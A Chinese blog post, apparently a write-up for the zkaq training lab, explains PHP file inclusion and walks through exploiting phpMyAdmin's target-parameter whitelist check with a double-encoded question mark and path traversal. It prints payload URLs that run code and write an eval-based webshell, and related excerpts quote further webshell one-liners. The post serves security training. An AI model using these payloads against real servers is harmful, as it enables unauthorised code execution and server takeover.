文件包含漏洞 --- zkaq

已于 2022-04-23 22:17:28 修改
阅读量2.2k 收藏
点赞数
分类专栏: WEB安全---zkaq靶场 文章标签: web安全
于 2022-04-23 22:14:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38237216/article/details/124371508
版权

1.概念

1.文件包含:利用开发语言的内置文件包含函数,在一个代码文件中引入了另外一个代码文件

一句话概括:文件包含并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。

文件包含核心就是引用

2.php常用的文件包含函数

  • include():文件包含,代码用到才去读取使用
  • require():文件包含,在代码执行前就去读取包含的文件一起执行
  • include_once():同一个文件只包含一次
  • require_once():同一个文件只包含一次

区别:include遇到错误还会往下执行,但是require不会

知识点—LFI&RFI:

  • LFI(Local File Include):本地文件包含
  • RFI(Remote File Include):远程文件包含

2.靶场

1.本地代码审计phpadmin源码,搜索文件包含函数include

2.分析关键函数的触发条件

1、target传参不为空和0
2、target传参必须为字符串
3、传参不能index开头
4、传参不能在白名单中
5、满足Core类中的checkPageValidity方法中的为true的条件

分析Core类中的checkPageValidity方法中的为true的条件

第三个if要求白名单,不可行;第四个if截取问号之前的函数进行白名单匹配,但传进include之后问号会报错;第五个if截取问号之前的函数进行白名单匹配,两次url编码传进include绕过

3.登录靶场建立数据库数据表,写入一句话木马

查看数据库路径

木马尝试,payload:http://wjbh522a.zs.aqlab.cn/index.php?target=server_binlog.php%253F/…/…/…/…/…/…/…/…/phpStudy/MySQL/data/plot/test.frm&888=phpinfo();

4.创建php webshell拿数据

上面的木马直接用菜刀连不上,需要浏览器登录才能访问,所以写一个php webshell

payload:http://wjbh522a.zs.aqlab.cn/index.php?target=server_binlog.php%253F/…/…/…/…/…/…/…/…/phpStudy/MySQL/data/plot/test.frm&888=file_put_contents(‘222.php’,‘<?php eval($_REQUEST[555])?>;’);

5.菜刀连接

real_plot
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache文件解析漏洞-01
09-15
Apache文件解析漏洞的危害性非常高,攻击者可以通过上传恶意文件到目标服务器,例如上传一个名为"1.php.xxxx"的文件,其中包含恶意代码,Apache服务器会错误地解析该文件为PHP文件,从而导致恶意代码执行。...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
文件上传---zkaq
weixin_38237216的博客
04-02 243
一.文件上传概念 黑名单绕过 1.后缀检测(最常见的检测方式)----根据后缀来决定用什么东西来处理这个文件 2.Content-type .php =>phtml php3 php4 php5 .htaccess => 分布式配置文件 Windows 文件与文件夹都不区分大小写 .php .Php Windows 会自动去除后缀末尾的空格 .php .php空格 windows会自动去除后缀末尾的. .php .php…… Windows文件流绕过(NTFS格式)123.txt:a.txt
验证码绕过---zkaq
weixin_38237216的博客
04-12 5747
1.概念 1.验证码绕过常见的场景 前端验证验证码,并没有后端验证。直接抓包然后进行跑数据包,反正有没有验证码的阻碍。 验证码设置了但是并没有效验,乱输验证码也能够成功的登录。 验证码可以重复使用。 验证码空值绕过。(比如,我们现在抓一个包,发现登录参数是user=admin&password=admin&yzm=4123。 yzm验证码参数,但是我们如果去掉yzm的传参我们就可以绕过验证码机制,直接传参user=admin&password=admin,验证码就失效了) 验证码干
[zkaq靶场]逻辑漏洞--验证码绕过(UsualToolCMS)
wwxxee
05-09 2633
逻辑漏洞–验证码绕过、密码找回漏洞 验证码绕过的常用姿势: 一、前端验证验证码,并没有后端验证。直接抓包然后进行跑数据包,反正有没有验证码的阻碍 二、验证码设置了但是并没有效验,乱输验证码也能够成功的登录 三、验证码可以重复使用,比如现在的验证码1111,然后虽然你登录失败后验证码会变,但是你输入1111他却判定你验证码正确(常见)https://www.uedbox.com/post/14207/ 四、.验证码空值绕过,比如,我们现在抓一个包,发现登录参数是user=admin&password=
[zkaq靶场]文件包含--(phpMyAdmin-4.8.1 )
wwxxee
05-10 306
文件包含 本地文件包含:LFI 远程文件包含:RFI(需要开启配置选项:allow_url_include=On) 靶场(phpMyAdmin-4.8.1 ) 本地测试 审计 全局搜索include,发现一些可疑之处: 具体代码是这一块: 需要执行到include需要满足这个if条件。 我们可以来分析一下这个条件: (! empty($_REQUEST['target'])//条件1 is_string($_REQUEST['target'])//条件2 ! preg_match('/^index/
phpMyAdmin 4.0.10 文件包含 -> getshell
2301_80115097的博客
06-25 850
gettype() 获取参数的属性也就是说我们的$var需要是一个数组这里的返回值就是True了还是刚刚说的那些,这里如果是Linux服务器的话,并且sql文件储存路径有大小写的话,就没办法拿到webshell了,并且还不能任意文件包含,还只能包含路径没有大写字符的,反正至少以我目前的水平是不行的,不过 linux 默认mysql文件的路径是 /var/lib/mysql/。默认情况下是无影响的。
xdcms漏洞合集-漏洞复现
zkaqlaoniao的博客
11-09 1050
XDcms订餐网站管理系统,主要使用Php+Mysql+Smarty技术基础进行开发,采用OOP(面向对象)方式进行基础运行框架搭建,集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整合等功能于一体的完全开源的高级订餐网站管理系统。作为国内最受欢迎的PHP类订餐网站系统之一,XDcms在不断提升用户服务、提高产品质量的同时更加注重用户体验。
命令执行漏洞--ibos靶场(靶场环境是掌控安全的)
xiesiyuan1的博客
02-27 1057
命令执行:用户传入的参数,会被当成系统指令来执行,指令内容用户可控,属于代码执行的一种ctrl+u:在view-source模式自动换行。
xdcms漏洞合集-漏洞复现_xdcms漏洞复现
2301_79985178的博客
06-25 649
XDcms订餐网站管理系统,主要使用Php+Mysql+Smarty技术基础进行开发,采用OOP(面向对象)方式进行基础运行框架搭建,集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整合等功能于一体的完全开源的高级订餐网站管理系统。作为国内最受欢迎的PHP类订餐网站系统之一,XDcms在不断提升用户服务、提高产品质量的同时更加注重用户体验。
[zkaq靶场]代码执行--DouPHP-v1.5漏洞
wwxxee
05-10 989
代码执行 相关函数与语句 eval():会将字符串当作代码执行。 <?php @eval($_REQUEST["code"])?> 单双引号输出问题: assert():如果传入字符串会被当做PHP代码执行 <?php @assert($_REQUEST["code"])?> 与eval的区别:eval可以执行多行,而assert只能执行一行。 当assert想要执行多行时,可以利用写文件的方式: file_put_contents("123.php","<?php
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
ms16-032本地溢出漏洞
06-27
这些文件或网页可能包含恶意代码,当用户打开或交互时,代码会试图触发漏洞执行攻击者的指令。 5. **缓解措施**:微软针对ms16-032发布了相应的安全补丁,用户应及时安装以修复漏洞。此外,保持操作系统和所有...
shiro-core 低版本漏洞检测
01-31
shiro-core 低版本漏洞检测工具
【网络安全的神秘世界】SQL注入(下)
weixin_54750312的博客
07-04 1426
通过前面的SQL注入实验可以发现,字符型的注入点我们都是用单引号来判断的,但是当遇到 addslashes() 函数时,单引号会被转义,导致我们用来判断注入点的单引号失效。在将数据存入到了数据库中之后,开发者就认为数据是可信的。通过前面的学习可以了解到,SQL注入非常关键的一步就是让引号闭合和跳出引号,无法跳出引号,那么输入的内容就永远在引号里,即永远是字符串,无法实现SOL注入。出现了语法错误,意味着输入的内容会到数据库中进行查询,接下来的步骤就很简单了,跟前面的报错注入是一样的。
网络安全&密码学—python中的各种加密算法
xt350488的博客
07-02 1078
数据加密是一种保护数据安全的技术,通过将数据(明文)转换为不易被未经授权的人理解的形式(密文),以防止数据泄露、篡改或滥用。加密后的数据(密文)可以通过解密过程恢复成原始数据(明文)。数据加密的核心是密码学,它是研究密码系统或通信安全的一门学科,包括密码编码学和密码分析学。在网络安全和密码学领域,数据加密是保护数据机密性、完整性和可用性的关键技术。Python作为一种功能强大的编程语言,提供了多种实现数据加密和解密的方法。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 952
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
Java中的网络安全与防护策略
最新发布
技术研究中心
07-04 455
通过本文的讨论,我们深入了解了Java中面临的网络安全挑战以及如何有效应对这些挑战的策略和方法。开发人员在设计和实现Java应用程序时,应始终牢记网络安全的重要性,并采取适当的防护措施,确保系统和数据的安全性。在Java中,可以使用正则表达式或者现成的验证框架,如Spring框架中的数据绑定和验证功能(例如Spring MVC的。在当今信息化时代,网络安全问题日益突出,尤其对于Java开发者来说,保障应用程序和数据的安全至关重要。同时,应用HTTPS协议确保数据在传输过程中的安全性。注解)来实现输入验证。
linux下dvwa文件远程包含漏洞,DVWA-文件包含漏洞
05-17
是一种常见的Web应用程序漏洞,攻击者可以通过该漏洞Web应用程序中包含外部文件,从而访问敏感信息或执行恶意代码。DVWA(Damn Vulnerable Web Application)是一个专门用于漏洞测试的Web应用程序,其中包含了一些常见的Web安全漏洞,包括文件包含漏洞。 在DVWA中,文件包含漏洞主要存在于以下两个文件中: 1. /dvwa/vulnerabilities/fi/index.php 2. /dvwa/vulnerabilities/fi_base64/index.php 攻击者可以通过构造恶意请求,将要包含的文件路径作为参数传递给上述文件中的一个或多个参数,从而实现文件包含。如果攻击者能够成功包含恶意文件,就可以执行任意代码,进而控制Web应用程序或服务器。 为了防止文件包含漏洞,可以采取以下措施: 1. 避免使用用户输入来构造文件路径参数。 2. 对用户输入进行严格的输入验证和过滤。 3. 使用白名单机制来限制可以包含的文件路径。 4. 对文件路径进行加密或编码,以避免攻击者能够轻易地构造恶意请求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值